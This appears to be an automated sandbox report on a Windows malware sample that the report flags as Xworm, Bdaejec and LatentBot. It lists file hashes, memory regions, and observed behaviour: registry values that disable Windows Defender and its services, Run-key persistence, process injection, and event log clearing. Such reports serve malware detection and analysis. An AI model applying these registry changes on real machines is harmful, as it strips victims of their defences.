| SHA256 | cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c |
| SHA512 | 96bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9d20bed748fbb656980b0328d7b74728 |
| SHA1 | 5fc8910c493356c0968a86452cb7952917b954b4 |
| SHA256 | 172fe07653a93456e66d5b90333de53e23a561cf982a1a9d96c3459339009069 |
| SHA512 | eb1f0ca1042371a0d324ba520a9c4159fe91d34cf1851d829b1bf874b92f69fd08c540558d03f9a8c3286926c3c12d89ef9a70ac649c053a02f26922918054f1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 871daa0605e2bf4f8259c6ed08922818 |
| SHA1 | 8448225f10d502ce858e9f6818945bf7994d5963 |
| SHA256 | d0fe73c3319af4bb23a904483ac9af46406b0b559023809daac4ab4dba0fc3e7 |
| SHA512 | f97ce6108457836d2059d9ddf7272a811a3d332275f5bcc3887b18cb1b9a9e6f4359ca808302f13ef4245d4b39ac4636bd926f869cfa7851531457cf2db595ed |
memory/1848-305-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ba169f4dcbbf147fe78ef0061a95e83b |
| SHA1 | 92a571a6eef49fff666e0f62a3545bcd1cdcda67 |
| SHA256 | 5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1 |
| SHA512 | 8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 01fff31a70e26012f37789b179059e32 |
| SHA1 | 555b6f05cce7daf46920df1c01eb5c55dc62c9e6 |
| SHA256 | adf65afaf1c83572f05a99bf2ede8eb7be1aab0717d5254f501d5e09ba6f587b |
| SHA512 | ac310c9bc5c1effc45e1e425972b09d1f961af216b50e1a504caa046b7f1a5f3179760e0b29591d83756ecb686d17a24770cf06fcea57e6f287ca5bbf6b6971b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9c740b7699e2363ac4ecdf496520ca35 |
| SHA1 | aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9 |
| SHA256 | be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61 |
| SHA512 | 8885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af |
memory/2988-376-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c9b6705519e1eef08f86c4ba5f4286f3 |
| SHA1 | 6c6b179e452ecee2673a1d4fe128f1c06f70577f |
| SHA256 | 0f9cad44a79126871580e19b01dc3f880c5173b1faaf8b9018d5d1f829714705 |
| SHA512 | 6d8f85a7a8b0b124530f36a157cd0441b5c1eacdc35e274af9fbf0569d03d1d5e468651a5b2425f0215c282ecfa7b1ffeaeeaf18612822f00bd14306d30640c7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c1a54dd5a1ab44cc4c4afd42f291c863 |
| SHA1 | b77043ab3582680fc96192e9d333a6be0ae0f69d |
| SHA256 | c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75 |
| SHA512 | 010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 217d9191dfd67252cef23229676c9eda |
| SHA1 | 80d940b01c28e3933b9d68b3e567adc2bac1289f |
| SHA256 | e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133 |
| SHA512 | 86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bdc0c67993f3d7ee47cf0765eed8b315 |
| SHA1 | 613f67e1441b9be51fa0c0c80cde0ee583e9bab9 |
| SHA256 | 7619e5f3aff33b8f08cf21b316c7f7d31b5581c8fe2aed48aac0c78a875dc18e |
| SHA512 | f43af2065141e7a4ded5aac2492fa5f56488f16d21ea25d89ea08181f727a03bf613894036ef30643c23747141f8b01dec96a305d8737bfa416c47e9737f0df8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c6a597e8737d320d364521986803cb2c |
| SHA1 | 6b542167fa6674b4f69a1bdd58c6f2fee4c57d49 |
| SHA256 | 17107fc01623db2c028aa7e666e462b5dbbcaf7245329c3089080560607ea368 |
| SHA512 | c4bca8516a5272a15ae118bfbcb11db6d0666c6f48cd035b545c3df0e6436ffe20a1417e82ffc77ec430bc62157123bd9497ab9f621c82a6e2d32772ba7b7c87 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2ad33642f863ae14ee53bc6853ee330e |
| SHA1 | ca81cc7d8c33a46ebe97bc1d3db55e41a813029e |
| SHA256 | 17c7b3c895766071a0d87318ec4134a9032ed113b46d3ba75889819a61a9cc19 |
| SHA512 | 52c59a7bde3751e07da53f3942c15cc3e19a4bf1929fbc28ae568ed96531852747b4f724e01438e159c4c98bf2d846db205c48e32f4b5984e9fddeb936eb8aa9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1542328a8546914b4e2f1aef9cb42bea |
| SHA1 | 7a0ac5969dfb20eb974e8a3bd8707243fa68f94f |
| SHA256 | 7584152ef93be4dc497db509c723f20a1fd09d69df02d62c897eefda6bf4c737 |
| SHA512 | b2b117abc97a64a71538d57c7f6c68c405d7ff5ef91dafe768832ff63378cb627af8b035b2a803627754c2219dd26755a2fa28e3a1bb9b1deb32ba13487ee286 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a11402783a8686e08f8fa987dd07bca |
| SHA1 | 580df3865059f4e2d8be10644590317336d146ce |
| SHA256 | 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0 |
| SHA512 | 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510 |
memory/4940-568-0x00000000001E0000-0x00000000001E9000-memory.dmp
memory/1048-569-0x00000000001E0000-0x00000000001E9000-memory.dmp
memory/4192-570-0x00000281734C0000-0x00000281734EA000-memory.dmp
memory/4192-571-0x00007FFC4E790000-0x00007FFC4E985000-memory.dmp
memory/4192-572-0x00007FFC4D200000-0x00007FFC4D2BE000-memory.dmp
memory/6124-576-0x0000000140000000-0x0000000140008000-memory.dmp
memory/6124-575-0x0000000140000000-0x0000000140008000-memory.dmp
memory/6124-574-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4348-578-0x00007FFC4E790000-0x00007FFC4E985000-memory.dmp
memory/4348-579-0x00007FFC4D200000-0x00007FFC4D2BE000-memory.dmp
memory/6124-573-0x0000000140000000-0x0000000140008000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
memory/6124-588-0x0000000140000000-0x0000000140008000-memory.dmp
memory/6124-590-0x00007FFC4E790000-0x00007FFC4E985000-memory.dmp
memory/2636-592-0x00007FFC4E790000-0x00007FFC4E985000-memory.dmp
memory/2636-593-0x00007FFC4D200000-0x00007FFC4D2BE000-memory.dmp
memory/6124-591-0x00007FFC4D200000-0x00007FFC4D2BE000-memory.dmp
memory/672-617-0x00007FFC0E810000-0x00007FFC0E820000-memory.dmp
memory/316-632-0x000002152BB10000-0x000002152BB3C000-memory.dmp
memory/956-628-0x00007FFC0E810000-0x00007FFC0E820000-memory.dmp
memory/956-627-0x0000017611FB0000-0x0000017611FDC000-memory.dmp
memory/956-621-0x0000017611FB0000-0x0000017611FDC000-memory.dmp
memory/672-616-0x0000024A15AD0000-0x0000024A15AFC000-memory.dmp
memory/672-610-0x0000024A15AD0000-0x0000024A15AFC000-memory.dmp
memory/616-606-0x00007FFC0E810000-0x00007FFC0E820000-memory.dmp
memory/616-605-0x000002A1FA330000-0x000002A1FA35C000-memory.dmp
memory/616-599-0x000002A1FA330000-0x000002A1FA35C000-memory.dmp
memory/616-598-0x000002A1FA330000-0x000002A1FA35C000-memory.dmp
memory/616-597-0x000002A1FA300000-0x000002A1FA326000-memory.dmp
memory/2636-594-0x0000000140000000-0x0000000140008000-memory.dmp
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 1e8e2076314d54dd72e7ee09ff8a52ab |
| SHA1 | 5fd0a67671430f66237f483eef39ff599b892272 |
| SHA256 | 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f |
| SHA512 | 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 0b990e24f1e839462c0ac35fef1d119e |
| SHA1 | 9e17905f8f68f9ce0a2024d57b537aa8b39c6708 |
| SHA256 | a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a |
| SHA512 | c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | ceb7caa4e9c4b8d760dbf7e9e5ca44c5 |
| SHA1 | a3879621f9493414d497ea6d70fbf17e283d5c08 |
| SHA256 | 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9 |
| SHA512 | 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | 7d612892b20e70250dbd00d0cdd4f09b |
| SHA1 | 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5 |
| SHA256 | 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02 |
| SHA512 | f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | 8abf2d6067c6f3191a015f84aa9b6efe |
| SHA1 | 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7 |
| SHA256 | ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea |
| SHA512 | c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | f313c5b4f95605026428425586317353 |
| SHA1 | 06be66fa06e1cffc54459c38d3d258f46669d01a |
| SHA256 | 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b |
| SHA512 | b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890 |
memory/1048-1510-0x00000000001E0000-0x00000000001E9000-memory.dmp
memory/4940-1509-0x00000000001E0000-0x00000000001E9000-memory.dmp
memory/2956-1511-0x00000000005F0000-0x00000000005F9000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-05-20 04:12
Reported
2025-05-20 04:26
Platform
win10ltsc2021-20250425-en
Max time kernel
870s
Max time network
870s
Command Line
Signatures
Bdaejec
Bdaejec family
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Bdaejec Backdoor.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gurcu family
Gurcu, WhiteSnake
LatentBot
Latentbot family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5464 created 612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 4284 created 612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Xworm family
Command and Scripting Interpreter: PowerShell
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\x69.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
Executes dropped EXE
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69install = "C:\\Users\\Admin\\AppData\\Roaming\\x69install.exe" | C:\Users\Admin\AppData\Local\Temp\x69.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" | C:\Users\Admin\AppData\Local\Temp\x69.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69Disable-winDefender = "C:\\Users\\Admin\\AppData\\Roaming\\x69Disable-winDefender.exe" | C:\Users\Admin\AppData\Local\Temp\x69.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Modifies Security services
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5464 set thread context of 420 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 4284 set thread context of 5312 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseAPToast.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\servertool.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\SELFCERT.EXE | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseAP.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\unpack200.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\java.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zFM.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\java.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\keytool.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\pack200.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
